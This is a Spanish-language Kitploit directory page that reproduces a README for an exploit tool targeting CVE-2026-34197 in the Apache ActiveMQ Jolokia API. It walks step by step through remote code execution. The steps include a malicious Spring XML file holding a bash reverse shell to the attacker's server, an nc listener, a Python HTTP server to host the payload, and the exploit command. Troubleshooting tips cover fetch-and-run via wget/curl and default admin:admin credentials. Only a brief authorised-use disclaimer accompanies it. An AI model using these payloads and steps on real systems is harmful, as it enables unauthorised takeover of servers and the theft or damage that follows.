Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — Exploit script para CVE-2026-34197, dirigido a la API Jolokia de Apache ActiveMQ para lograr ejecución remota de código mediante una configuración XML maliciosa de Spring, con capacidad de shell inversa. | Kitploit
Herramientas/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

Exploit script para CVE-2026-34197, dirigido a la API Jolokia de Apache ActiveMQ para lograr ejecución remota de código mediante una configuración XML maliciosa de Spring, con capacidad de shell inversa.

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Guía de Reproducción de la Vulnerabilidad RCE en ActiveMQ Jolokia

Este repositorio proporciona un entorno de reproducción y un script de explotación para la vulnerabilidad de ejecución remota de código (RCE) basada en la interfaz Jolokia API (/api/jolokia/) expuesta en Apache ActiveMQ. Al invocar la operación addNetworkConnector, se fuerza a ActiveMQ a analizar un archivo de configuración Spring XML remoto creado de forma maliciosa, aprovechando así MethodInvokingFactoryBean para ejecutar comandos del sistema.

📁 Archivos incluidos

  • payload.py: Script principal de explotación que envía solicitudes HTTP POST con un nombre de Broker dinámico.
  • payload.xml: Archivo de configuración Spring Bean malicioso que contiene la carga útil del comando de reverse shell.

🛠️ Preparación del entorno

  1. Entorno Python 3
  2. Instalar dependencias:
    root@kitploit:~
    pip install requests
    
  3. Máquina atacante (p. ej., servidor en la nube): Debe tener una IP pública y poder abrir puertos para el servicio HTTP y el puerto de escucha del reverse shell.
  4. Máquina objetivo: Servicio ActiveMQ vulnerable (p. ej., imagen Docker apache/activemq-classic:6.1.0).

🚀 Pasos para la reproducción

1. Configurar la carga útil del ataque (payload.xml)

Abra payload.xml en la máquina atacante y localice la siguiente sección:

root@kitploit:~
<value>bash -c 'bash -i >& /dev/tcp/LA_IP_DE_SU_SERVIDOR_EN_LA_NUBE/15000 0>&1'</value>

Reemplace la IP por la IP pública de su servidor en la nube. Si el entorno objetivo no tiene bash, cámbielo por sh u otro método de ejecución según el entorno objetivo.

2. Iniciar la escucha del reverse shell

En la máquina atacante (servidor en la nube), abra una terminal y escuche en el puerto especificado (p. ej., 15000):

root@kitploit:~
nc -lvvp 15000

Nota: Asegúrese de que el grupo de seguridad/cortafuegos del servidor en la nube haya permitido el tráfico entrante TCP en el puerto 15000.

3. Iniciar el servicio HTTP para alojar la carga útil

En la máquina atacante (en el mismo directorio donde se encuentra payload.xml), inicie un servidor HTTP para que el objetivo pueda descargar el archivo XML:

root@kitploit:~
python3 -m http.server 9000

Nota: También debe asegurarse de que el grupo de seguridad/cortafuegos del servidor en la nube haya permitido el tráfico entrante TCP en el puerto 9000.

4. Ejecutar el script de explotación

Ejecute payload.py en la máquina local (o en la máquina atacante). El script admite pasar la IP:puerto del ActiveMQ objetivo (-t) y la IP:puerto de la máquina atacante que aloja el XML (-a) mediante argumentos de línea de comandos.

root@kitploit:~
python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000

Tras la ejecución, el script generará automáticamente un brokerName aleatorio (p. ej., rce_a1b2c3) para resolver por completo el error de conflicto de nombres java.io.IOException : Network Connector could not be registered in JMX.

5. Obtener la shell

Si la explotación tiene éxito:

  1. Su servidor HTTP (python3 -m http.server 9000) mostrará un registro de solicitud GET 200 para /payload.xml.
  2. Su terminal de escucha nc recibirá la conexión del reverse shell desde la máquina objetivo.

⚠️ Solución de problemas comunes

  1. Se obtuvo el XML correctamente (HTTP 200), pero no se recibió la shell:
    • Causa A: El grupo de seguridad del servidor en la nube bloqueó el reverse shell (el tráfico entrante en el puerto 15000 no está permitido).
    • Causa B: El contenedor objetivo no tiene el comando /bin/bash (común en imágenes base minimalistas como Alpine). Modifique el comando de ejecución en payload.xml a /bin/sh, o use wget/curl para transferir un script y luego ejecutarlo.
  2. El objetivo devuelve el error 401 Unauthorized:
  • Causa: Las versiones más recientes de ActiveMQ / la interfaz Jolokia requieren autenticación con nombre de usuario y contraseña.
  • Solución: Si se trata de credenciales predeterminadas, puede agregar Basic Auth a la solicitud (p. ej., admin:admin).

🛡️ Aviso legal

Este script y las instrucciones están destinados únicamente a pruebas de seguridad autorizadas y fines educativos. Está estrictamente prohibido su uso para pruebas ilegales no autorizadas. El usuario es responsable de sus propias acciones.

Descargar herramienta